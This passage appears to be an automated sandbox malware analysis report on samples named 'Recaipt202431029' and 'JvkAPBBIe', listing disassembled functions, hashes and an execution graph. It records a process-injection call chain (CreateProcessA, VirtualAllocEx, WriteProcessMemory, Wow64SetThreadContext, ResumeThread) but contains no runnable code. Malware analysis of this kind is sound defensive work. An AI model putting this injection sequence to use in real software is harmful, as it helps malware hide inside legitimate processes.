                • Opcode ID: 92ebabe7b2149c583c4c1a17cc2dda1ebf7cad421110c306f81df56fab48352f
                • Instruction ID: b264a96e58c937805a98b3b480269db46207d99c1bcb467d11607c776b4cd933
                • Opcode Fuzzy Hash: 92ebabe7b2149c583c4c1a17cc2dda1ebf7cad421110c306f81df56fab48352f
                • Instruction Fuzzy Hash: C6210071684204DFDB15EF68C580B2ABFA5FB84354F60C56DD9094F652D33AC806C661
                Function 015AD006 Relevance: .1, Instructions: 61COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.4557949915.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_15ad000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 10b9548aac25334eb3479c2fd93d72964836a7e9bdb166b7a88a9b6bde0438c8
                • Instruction ID: c3e7fc52f23c5614465de0b926d00f9ef9419a388befde3c67f3f9e7a7977436
                • Opcode Fuzzy Hash: 10b9548aac25334eb3479c2fd93d72964836a7e9bdb166b7a88a9b6bde0438c8
                • Instruction Fuzzy Hash: A621A1755493808FDB13DF24C580719BF71FB46214F29C5EAD8498F6A3C33A984ACB62
                Function 012AD423 Relevance: .1, Instructions: 56COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.4557646767.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_12ad000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                • Instruction ID: 8c36c7013edc1e16a30bcbac6a6321d42c1549656c2b80616eac73acd8782891
                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                • Instruction Fuzzy Hash: 4B112676404284CFDB12CF54D5C4B56BF71FB88314F24C5A9D9490B657C336D45ACBA2
                Function 015AD2AF Relevance: .1, Instructions: 53COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.4557949915.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_15ad000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                • Instruction ID: e4bf751e4b0ef997e31f437c8ea2304c4a0a0241c1f096b5e8da0720254b5497
                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                • Instruction Fuzzy Hash: 5E11DD75544280CFDB02DF54D5C4B19BFB1FB84314F28C6AAD9494F652C33AD40ACBA2
                Function 015AD0F7 Relevance: .1, Instructions: 53COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.4557949915.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_15ad000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                • Instruction ID: ec1dab59090a600a4e996e678cdc19907a9984b1c33e902eb46fcc9ac5eed0f6
                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                • Instruction Fuzzy Hash: 34110D75544280CFDB02DF54D9C4B19BFB1FB84314F24CAA9D8494F652C33AE40ACB62

                Execution Graph

                Execution Coverage:7.8%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:0%
                Total number of Nodes:249
                Total number of Limit Nodes:17
                execution_graph 54079 e4d6c0 54080 e4d706 GetCurrentProcess 54079->54080 54082 e4d751 54080->54082 54083 e4d758 GetCurrentThread 54080->54083 54082->54083 54084 e4d795 GetCurrentProcess 54083->54084 54085 e4d78e 54083->54085 54086 e4d7cb 54084->54086 54085->54084 54087 e4d7f3 GetCurrentThreadId 54086->54087 54088 e4d824 54087->54088 54089 6ebebc0 54090 6ebebe6 54089->54090 54091 6ebec40 54090->54091 54093 7080e48 54090->54093 54095 7080e69 54093->54095 54094 7080e9f 54094->54091 54095->54094 54098 7081138 54095->54098 54102 7081140 54095->54102 54099 708113f PostMessageW 54098->54099 54101 70811ac 54099->54101 54101->54095 54103 7081173 PostMessageW 54102->54103 54105 70811ac 54103->54105 54105->54095 54002 e44668 54003 e4467a 54002->54003 54004 e44686 54003->54004 54008 e44779 54003->54008 54013 e43e28 54004->54013 54006 e446a5 54009 e4479d 54008->54009 54017 e44888 54009->54017 54021 e44878 54009->54021 54014 e43e33 54013->54014 54029 e45d2c 54014->54029 54016 e470a2 54016->54006 54018 e448af 54017->54018 54020 e4498c 54018->54020 54025 e444b0 54018->54025 54023 e448af 54021->54023 54022 e4498c 54022->54022 54023->54022 54024 e444b0 CreateActCtxA 54023->54024 54024->54022 54026 e45918 CreateActCtxA 54025->54026 54028 e459db 54026->54028 54030 e45d37 54029->54030 54033 e45d4c 54030->54033 54032 e4751d 54032->54016 54034 e45d57 54033->54034 54037 e45d7c 54034->54037 54036 e475fa 54036->54032 54038 e45d87 54037->54038 54041 e45dac 54038->54041 54040 e476ed 54040->54036 54042 e45db7 54041->54042 54044 e48c4b 54042->54044 54047 e4aef1 54042->54047 54043 e48c89 54043->54040 54044->54043 54050 e4cfe0 54044->54050 54055 e4b330 54047->54055 54051 e4d011 54050->54051 54052 e4d035 54051->54052 54063 e4d5a8 54051->54063 54067 e4d599 54051->54067 54052->54043 54058 e4b417 54055->54058 54056 e4af06 54056->54044 54059 e4b439 54058->54059 54060 e4b45c 54058->54060 54059->54060 54061 e4b660 GetModuleHandleW 54059->54061 54060->54056 54062 e4b68d 54061->54062 54062->54056 54065 e4d5b5 54063->54065 54064 e4d5ef 54064->54052 54065->54064 54071 e4d3e0 54065->54071 54068 e4d5b5 54067->54068 54069 e4d5ef 54068->54069 54070 e4d3e0 GetModuleHandleW 54068->54070 54069->54052 54070->54069 54072 e4d3e5 54071->54072 54074 e4df00 54072->54074 54075 e4d4fc 54072->54075 54074->54074 54076 e4d507 54075->54076 54077 e45dac GetModuleHandleW 54076->54077 54078 e4df6f 54077->54078 54078->54074 54106 e4d908 DuplicateHandle 54107 e4d99e 54106->54107 54108 705d6f8 54113 705f038 54108->54113 54131 705f028 54108->54131 54149 705f07f 54108->54149 54109 705d707 54114 705f046 54113->54114 54168 708046e 54114->54168 54173 70806f7 54114->54173 54181 7080277 54114->54181 54193 70804f3 54114->54193 54197 7080253 54114->54197 54209 7080872 54114->54209 54213 7080310 54114->54213 54218 70808be 54114->54218 54230 7080778 54114->54230 54242 7080947 54114->54242 54246 7080007 54114->54246 54252 7080126 54114->54252 54258 7080426 54114->54258 54262 7080040 54114->54262 54268 708070f 54114->54268 54115 705f076 54115->54109 54132 705f038 54131->54132 54134 708046e 2 API calls 54132->54134 54135 708070f 2 API calls 54132->54135 54136 7080040 2 API calls 54132->54136 54137 7080426 2 API calls 54132->54137 54138 7080126 2 API calls 54132->54138 54139 7080007 2 API calls 54132->54139 54140 7080947 2 API calls 54132->54140 54141 7080778 6 API calls 54132->54141 54142 70808be 6 API calls 54132->54142 54143 7080310 2 API calls 54132->54143 54144 7080872 2 API calls 54132->54144 54145 7080253 6 API calls 54132->54145 54146 70804f3 2 API calls 54132->54146 54147 7080277 6 API calls 54132->54147 54148 70806f7 4 API calls 54132->54148 54133 705f076 54133->54109 54134->54133 54135->54133 54136->54133 54137->54133 54138->54133 54139->54133 54140->54133 54141->54133 54142->54133 54143->54133 54144->54133 54145->54133 54146->54133 54147->54133 54148->54133 54150 705f046 54149->54150 54152 705f08a 54149->54152 54153 708046e 2 API calls 54150->54153 54154 708070f 2 API calls 54150->54154 54155 7080040 2 API calls 54150->54155 54156 7080426 2 API calls 54150->54156 54157 7080126 2 API calls 54150->54157 54158 7080007 2 API calls 54150->54158 54159 7080947 2 API calls 54150->54159 54160 7080778 6 API calls 54150->54160 54161 70808be 6 API calls 54150->54161 54162 7080310 2 API calls 54150->54162 54163 7080872 2 API calls 54150->54163 54164 7080253 6 API calls 54150->54164 54165 70804f3 2 API calls 54150->54165 54166 7080277 6 API calls 54150->54166 54167 70806f7 4 API calls 54150->54167 54151 705f076 54151->54109 54153->54151 54154->54151 54155->54151 54156->54151 54157->54151 54158->54151 54159->54151 54160->54151 54161->54151 54162->54151 54163->54151 54164->54151 54165->54151 54166->54151 54167->54151 54169 7080474 54168->54169 54272 705cf80 54169->54272 54276 705cf88 54169->54276 54170 7080a6f 54174 7080699 54173->54174 54174->54173 54176 70803ec 54174->54176 54288 705cdf0 54174->54288 54292 705cde8 54174->54292 54175 7080829 54175->54115 54176->54175 54280 705cd40 54176->54280 54284 705cd38 54176->54284 54182 708025f 54181->54182 54183 7080271 54182->54183 54186 7080c03 54182->54186 54187 705cf80 WriteProcessMemory 54182->54187 54188 705cf88 WriteProcessMemory 54182->54188 54185 70803ec 54183->54185 54189 705cdf0 Wow64SetThreadContext 54183->54189 54190 705cde8 Wow64SetThreadContext 54183->54190 54184 7080829 54184->54115 54185->54184 54191 705cd40 ResumeThread 54185->54191 54192 705cd38 ResumeThread 54185->54192 54186->54115 54187->54182 54188->54182 54189->54183 54190->54183 54191->54185 54192->54185 54194 708050d 54193->54194 54195 705cd40 ResumeThread 54194->54195 54196 705cd38 ResumeThread 54194->54196 54195->54194 54196->54194 54200 708025f 54197->54200 54198 7080271 54202 70803ec 54198->54202 54203 705cdf0 Wow64SetThreadContext 54198->54203 54204 705cde8 Wow64SetThreadContext 54198->54204 54199 7080829 54199->54115 54200->54198 54201 7080c03 54200->54201 54207 705cf80 WriteProcessMemory 54200->54207 54208 705cf88 WriteProcessMemory 54200->54208 54201->54115 54202->54199 54205 705cd40 ResumeThread 54202->54205 54206 705cd38 ResumeThread 54202->54206 54203->54198 54204->54198 54205->54202 54206->54202 54207->54200 54208->54200 54211 705cdf0 Wow64SetThreadContext 54209->54211 54212 705cde8 Wow64SetThreadContext 54209->54212 54210 708049f 54210->54115 54211->54210 54212->54210 54214 7080316 54213->54214 54296 705d070 54214->54296 54300 705d078 54214->54300 54215 7080339 54215->54115 54219 708025f 54218->54219 54220 7080271 54219->54220 54223 7080c03 54219->54223 54228 705cf80 WriteProcessMemory 54219->54228 54229 705cf88 WriteProcessMemory 54219->54229 54222 70803ec 54220->54222 54224 705cdf0 Wow64SetThreadContext 54220->54224 54225 705cde8 Wow64SetThreadContext 54220->54225 54221 7080829 54221->54115 54222->54221 54226 705cd40 ResumeThread 54222->54226 54227 705cd38 ResumeThread 54222->54227 54223->54115 54224->54220 54225->54220 54226->54222 54227->54222 54228->54219 54229->54219 54236 705cf80 WriteProcessMemory 54230->54236 54237 705cf88 WriteProcessMemory 54230->54237 54231 708025f 54231->54230 54232 7080c03 54231->54232 54233 7080271 54231->54233 54232->54115 54235 70803ec 54233->54235 54240 705cdf0 Wow64SetThreadContext 54233->54240 54241 705cde8 Wow64SetThreadContext 54233->54241 54234 7080829 54234->54115 54235->54234 54238 705cd40 ResumeThread 54235->54238 54239 705cd38 ResumeThread 54235->54239 54236->54231 54237->54231 54238->54235 54239->54235 54240->54233 54241->54233 54304 705cec0 54242->54304 54308 705cec8 54242->54308 54243 7080965 54248 7080040 54246->54248 54247 70801cb 54247->54115 54248->54247 54312 705d210 54248->54312 54316 705d209 54248->54316 54254 708012f 54252->54254 54253 70801cb 54253->54115 54254->54253 54256 705d210 CreateProcessA 54254->54256 54257 705d209 CreateProcessA 54254->54257 54255 7080234 54255->54115 54256->54255 54257->54255 54259 7080433 54258->54259 54260 705cd40 ResumeThread 54259->54260 54261 705cd38 ResumeThread 54259->54261 54260->54259 54261->54259 54264 7080073 54262->54264 54263 70801cb 54263->54115 54264->54263 54266 705d210 CreateProcessA 54264->54266 54267 705d209 CreateProcessA 54264->54267 54265 7080234 54265->54115 54266->54265 54267->54265 54270 705cf80 WriteProcessMemory 54268->54270 54271 705cf88 WriteProcessMemory 54268->54271 54269 7080740 54270->54269 54271->54269 54273 705cf87 WriteProcessMemory 54272->54273 54275 705d027 54273->54275 54275->54170 54277 705cfbb WriteProcessMemory 54276->54277 54279 705d027 54277->54279 54279->54170 54281 705cd80 ResumeThread 54280->54281 54283 705cdb1 54281->54283 54283->54176 54285 705cd40 ResumeThread 54284->54285 54287 705cdb1 54285->54287 54287->54176 54289 705ce35 Wow64SetThreadContext 54288->54289 54291 705ce7d 54289->54291 54291->54174 54293 705ce35 Wow64SetThreadContext 54292->54293 54295 705ce7d 54293->54295 54295->54174 54297 705d078 ReadProcessMemory 54296->54297 54299 705d107 54297->54299 54299->54215 54301 705d0c3 ReadProcessMemory 54300->54301 54303 705d107 54301->54303 54303->54215 54305 705cec7 VirtualAllocEx 54304->54305 54307 705cf45 54305->54307 54307->54243 54309 705cefb VirtualAllocEx 54308->54309 54311 705cf45 54309->54311 54311->54243 54313 705d299 CreateProcessA 54312->54313 54315 705d45b 54313->54315 54317 705d210 CreateProcessA 54316->54317 54319 705d45b 54317->54319

                Executed Functions

                Function 057E8C78 Relevance: 27.5, Strings: 21, Instructions: 1232COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID: $eq$,aq$,aq$4c]q$4c]q$heq$heq$heq$|b^q$|b^q$|b^q$$]q$$]q$$]q$;($[0$c]q$c]q$c]q$c]q$k0
                • API String ID: 0-1774614325
                • Opcode ID: d1aa51b1196c96d77ed38c3a7ee4cd94f137d4bbcae7ddfb257a51fbb01ecaf4
                • Instruction ID: d6d57a75056af80a21101e1dd20ebf65e78f3d2d19c86eae59ecad8a8f6a406d
                • Opcode Fuzzy Hash: d1aa51b1196c96d77ed38c3a7ee4cd94f137d4bbcae7ddfb257a51fbb01ecaf4
                • Instruction Fuzzy Hash: 02B23774B002148FCB28DF29C994A69BBF6FF88710F1585A9E54ADB3A5DB30DC81CB51
                Function 00E4D6B0 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 672 e4d6b0-e4d74f GetCurrentProcess 676 e4d751-e4d757 672->676 677 e4d758-e4d78c GetCurrentThread 672->677 676->677 678 e4d795-e4d7c9 GetCurrentProcess 677->678 679 e4d78e-e4d794 677->679 681 e4d7d2-e4d7ed call e4d890 678->681 682 e4d7cb-e4d7d1 678->682 679->678 685 e4d7f3-e4d822 GetCurrentThreadId 681->685 682->681 686 e4d824-e4d82a 685->686 687 e4d82b-e4d88d 685->687 686->687
                APIs
                • GetCurrentProcess.KERNEL32 ref: 00E4D73E
                • GetCurrentThread.KERNEL32 ref: 00E4D77B
                • GetCurrentProcess.KERNEL32 ref: 00E4D7B8
                • GetCurrentThreadId.KERNEL32 ref: 00E4D811
                Memory Dump Source
                • Source File: 0000000A.00000002.2178617461.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_e40000_JvkAPBBIe.jbxd
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: 852eb3e9b655a320f22a69f356d7d7b330247f88cf87043cfd81d22b38c46157
                • Instruction ID: 8f2b2677f28f5405f11490e9cf5ab1b21ee63d8a1b4882b1df198851861ad7cd
                • Opcode Fuzzy Hash: 852eb3e9b655a320f22a69f356d7d7b330247f88cf87043cfd81d22b38c46157
                • Instruction Fuzzy Hash: 0A5168B09007498FDB18DFA9D948BAEBBF1FF89314F208069E419B7390D7749984CB65
                Function 00E4D6C0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 694 e4d6c0-e4d74f GetCurrentProcess 698 e4d751-e4d757 694->698 699 e4d758-e4d78c GetCurrentThread 694->699 698->699 700 e4d795-e4d7c9 GetCurrentProcess 699->700 701 e4d78e-e4d794 699->701 703 e4d7d2-e4d7ed call e4d890 700->703 704 e4d7cb-e4d7d1 700->704 701->700 707 e4d7f3-e4d822 GetCurrentThreadId 703->707 704->703 708 e4d824-e4d82a 707->708 709 e4d82b-e4d88d 707->709 708->709
                APIs
                • GetCurrentProcess.KERNEL32 ref: 00E4D73E
                • GetCurrentThread.KERNEL32 ref: 00E4D77B
                • GetCurrentProcess.KERNEL32 ref: 00E4D7B8
                • GetCurrentThreadId.KERNEL32 ref: 00E4D811
                Memory Dump Source
                • Source File: 0000000A.00000002.2178617461.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_e40000_JvkAPBBIe.jbxd
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: 63ba2f6fd585970b30758bfb44baea498223a023cc31f904564c10c2814ed83e
                • Instruction ID: 1fc47c257a86c9fbf4413cae6c2791d3cecd761084027b7dd77b3c269b90e198
                • Opcode Fuzzy Hash: 63ba2f6fd585970b30758bfb44baea498223a023cc31f904564c10c2814ed83e
                • Instruction Fuzzy Hash: A85138B09016098FDB18DFA9D948BAEBBF1FF88314F20C469D419B7350D7749984CB65
                Function 057E9E68 Relevance: 3.9, Strings: 3, Instructions: 113COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 716 57e9e68-57e9e81 718 57e9ebb-57e9ee0 716->718 719 57e9e83-57e9e85 716->719 720 57e9ee7-57e9f0c 718->720 719->720 721 57e9e87-57e9e89 719->721 724 57e9f13-57e9f6c 720->724 723 57e9e8f-57e9e98 721->723 721->724 725 57e9e9a-57e9ea4 723->725 726 57e9ea6 723->726 739 57e9f6e 724->739 740 57e9f78-57e9fb2 724->740 730 57e9ea8-57e9eab 725->730 726->730 735 57e9eb3-57e9eb8 730->735 739->740
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID: (aq$(aq$(aq
                • API String ID: 0-2593664646
                • Opcode ID: 64055ca06486e7973a232bb66ff391d911eca6155d15fb908990add40cf492da
                • Instruction ID: 0197df84b6cb147a042abcf9e7fd60378d20e596a527e02edd9ba0c7c4871329
                • Opcode Fuzzy Hash: 64055ca06486e7973a232bb66ff391d911eca6155d15fb908990add40cf492da
                • Instruction Fuzzy Hash: 7F3126327042155FC754DE6DD840AAFBBEAEFC8361724812AE909DB389DE31DD0287E1
                Function 057EC1B0 Relevance: 3.3, Instructions: 3262COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 803 57ec1b0-57ec218 809 57ec26f-57ec291 803->809 810 57ec21a-57ec25f 803->810 813 57ec295-57ec2ac 809->813 814 57ec293 809->814 1493 57ec261 call 57efac8 810->1493 1494 57ec261 call 57efab8 810->1494 1495 57ec261 call 57efb70 810->1495 1496 57ec261 call 57efb20 810->1496 818 57ec2ae-57ec2b8 813->818 819 57ec2b9-57ec44d 813->819 814->813 843 57efa2a-57efa68 819->843 844 57ec453-57ec4ad 819->844 820 57ec267-57ec26e 844->843 850 57ec4b3-57ef252 844->850 850->843 1401 57ef258-57ef2c7 850->1401 1401->843 1406 57ef2cd-57ef33c 1401->1406 1406->843 1411 57ef342-57ef8bb 1406->1411 1411->843 1476 57ef8c1-57efa29 1411->1476 1493->820 1494->820 1495->820 1496->820
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c472f78a28859c2e33d696c1e635e9dd927d4e703766337f9afa4b91892fa846
                • Instruction ID: 567e5b412f2065ef9c1563fb86c729fb85194a1b8fabdfe31e6e18ea7cb0540e
                • Opcode Fuzzy Hash: c472f78a28859c2e33d696c1e635e9dd927d4e703766337f9afa4b91892fa846
                • Instruction Fuzzy Hash: 6D63AD70A902189FEB299F50CC56BAEBA76FF85700F5040E9E2093B3D1DA711E81DF65
                Function 00E4B417 Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 00E4B67E
                Memory Dump Source
                • Source File: 0000000A.00000002.2178617461.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_e40000_JvkAPBBIe.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: c71040ee1dcf71c90ea2691c355704aecbc10f99ec02083dbf717975975f91d0
                • Instruction ID: 36a70b5c7de9dbc002094cd83d1147670086a38fa119a741f52e8f2032830525
                • Opcode Fuzzy Hash: c71040ee1dcf71c90ea2691c355704aecbc10f99ec02083dbf717975975f91d0
                • Instruction Fuzzy Hash: 6C815570A00B458FDB24DF2AE45575ABBF1FF88304F00892ED49AEBA51D774E845CB91
                Function 00E444B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                Download Yara Rule
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 00E459C9
                Memory Dump Source
                • Source File: 0000000A.00000002.2178617461.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_e40000_JvkAPBBIe.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 30df42f7a063cfa4fcc072789ecce4d0c2085877c235ad478884b61f9942b1f4
                • Instruction ID: 81fa8cf160442747df4c0c472b0806e666a7b4d2571d682b5d05dc6870e484ba
                • Opcode Fuzzy Hash: 30df42f7a063cfa4fcc072789ecce4d0c2085877c235ad478884b61f9942b1f4
                • Instruction Fuzzy Hash: ED41F2B1C00719CBDB24CFA9C844B9DBBF5BF48304F20806AD418BB255DB756946CF90
                Function 00E4590D Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                Download Yara Rule
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 00E459C9
                Memory Dump Source
                • Source File: 0000000A.00000002.2178617461.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_e40000_JvkAPBBIe.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: abd19e2e6a2c6b8071a5089c4bca4884e14f506efebe8df0e6f047048c8c1f41
                • Instruction ID: bc2c71ba5b9d119109c8ade37c73d97256d73d88c3b6254698ac71ac018946aa
                • Opcode Fuzzy Hash: abd19e2e6a2c6b8071a5089c4bca4884e14f506efebe8df0e6f047048c8c1f41
                • Instruction Fuzzy Hash: B041F2B1C00719CBDB28CFA9C884B9DBBF1BF48304F20855AD408AB255DB755946CF51
                Function 00E4D900 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                Download Yara Rule
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E4D98F
                Memory Dump Source
                • Source File: 0000000A.00000002.2178617461.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_e40000_JvkAPBBIe.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 02de6d2919a7c7591773712cae72b1b6f3bdd23d00390010c517202a37a96548
                • Instruction ID: c361ef28c9510649f675716cc283264f2d901c6d686147226001fa15466a1800
                • Opcode Fuzzy Hash: 02de6d2919a7c7591773712cae72b1b6f3bdd23d00390010c517202a37a96548
                • Instruction Fuzzy Hash: 462105B59002499FDB10CF9AD884ADEFFF4FB49310F14805AE918A7350C379A980CFA5
                Function 00E4B618 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 00E4B67E
                Memory Dump Source
                • Source File: 0000000A.00000002.2178617461.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_e40000_JvkAPBBIe.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 53f3ed20040f494ef3782a1bc83ad01fd65562de54454c21ad8dd0ea297cff8d
                • Instruction ID: 18ad26c2dfdd75441c8474558106d2d11d80021928519ffc10883975c97b3dd4
                • Opcode Fuzzy Hash: 53f3ed20040f494ef3782a1bc83ad01fd65562de54454c21ad8dd0ea297cff8d
                • Instruction Fuzzy Hash: A011DFB5C002498FDB10DF9AD444A9EFBF8EB88314F11846AD829B7210C379A545CFA5
                Function 057E7758 Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID: Haq
                • API String ID: 0-725504367
                • Opcode ID: 4d6dd82a0586176787347e14ce94f61c157e767d44fc3982e4ef23266865b58b
                • Instruction ID: 1d1da7fad554fb6500f594ccfef7ef5978f63092ad51551ea8dd3fce71e3eda6
                • Opcode Fuzzy Hash: 4d6dd82a0586176787347e14ce94f61c157e767d44fc3982e4ef23266865b58b
                • Instruction Fuzzy Hash: 21A1A170A003459FCB19DF28D584A5EBBF6FF89300B248569D4599F362DB31ED45CBA0
                Function 057E7F08 Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID: 4']q
                • API String ID: 0-1259897404
                • Opcode ID: 1a219b7a21d818619a8110c7f86370e7650a038f838a6c869f138aaada0852c5
                • Instruction ID: b194f675b10c19931c01f2d41ce633c741287c3b47868f1cf5a542c30f446d5a
                • Opcode Fuzzy Hash: 1a219b7a21d818619a8110c7f86370e7650a038f838a6c869f138aaada0852c5
                • Instruction Fuzzy Hash: 2351BEB1A003069FC709DF6CD58499EBBF6FF88310B1586A9D4099B366DB30ED45CBA0
                Function 057E7F18 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID: 4']q
                • API String ID: 0-1259897404
                • Opcode ID: f2d5c8d4a6fbabb3958295e174071944e367118e5e4e61f4fc1d0b44c7b0579d
                • Instruction ID: 8d4e24b8bb70d0f7c192bb704bb85f4c6f73067c6447b3f264796c2cb9316b1a
                • Opcode Fuzzy Hash: f2d5c8d4a6fbabb3958295e174071944e367118e5e4e61f4fc1d0b44c7b0579d
                • Instruction Fuzzy Hash: 3751A0B1A003069FC709DF68C58495EBBF6FF89310B158AA9D4099B366DB30ED45CBA0
                Function 057E8A50 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_57e0000_JvkAPBBIe.jbxd
                Similarity
                • API ID:
                • String ID: `]bq
                • API String ID: 0-248503667
                • Opcode ID: e5c2a4a84eca9c49732e747ce082e136371211062d0581664940145aa76ffaa8
                • Instruction ID: fc4a73cd21e4b87679f877a79f5abe1783d225badc9af267427018ea42a2eaa6
                • Opcode Fuzzy Hash: e5c2a4a84eca9c49732e747ce082e136371211062d0581664940145aa76ffaa8
                • Instruction Fuzzy Hash: E3418D327047158FCB14CF6DDA85A6ABBE5FF89311B1580AAD909DB362DA30DC41CB61
                Function 057E6C20 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.2187946373.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                Joe Sandbox IDA Plugin
